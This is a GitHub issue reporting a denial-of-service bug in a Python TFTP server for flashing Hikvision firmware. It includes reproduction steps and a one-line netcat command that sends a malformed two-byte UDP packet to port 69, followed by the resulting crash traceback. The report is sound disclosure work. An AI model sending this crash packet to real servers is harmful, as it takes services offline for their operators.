Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

DoS when parsing a packet #15

Open
grandnew opened this issue Oct 26, 2023 · 0 comments
Open

DoS when parsing a packet #15

grandnew opened this issue Oct 26, 2023 · 0 comments

Comments

@grandnew
Copy link

There is a Denied-of-Service bug in the _tftp_read function in theServer class on the parse of a packet with content 0x0004.

Reproduce

1. Prepare

Download the firmware digicap.dav to the root directory of the project from hikvisioneurope.

2. Start the Server

python hikvision_tftpd.py --server-ip 127.0.0.1

3. Attack

Send a UDP packet with the following payload:

echo -n "0004" | xxd -r -p | nc -u 127.0.0.1 69

Then, the server will crash and the logs are as follows:

Setting block size to 512
Serving 22651096-byte digicap.dav (block size 512, 44241 blocks)
Traceback (most recent call last):
  File "hikvision_tftpd.py", line 193, in <module>
    server.run_forever()
  File "hikvision_tftpd.py", line 102, in run_forever
    self._iterate()
  File "hikvision_tftpd.py", line 110, in _iterate
    self._tftp_read()
  File "hikvision_tftpd.py", line 139, in _tftp_read
    '>H', pkt[len(self._TFTP_ACK_PREFIX):])
struct.error: unpack requires a string argument of length 2
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant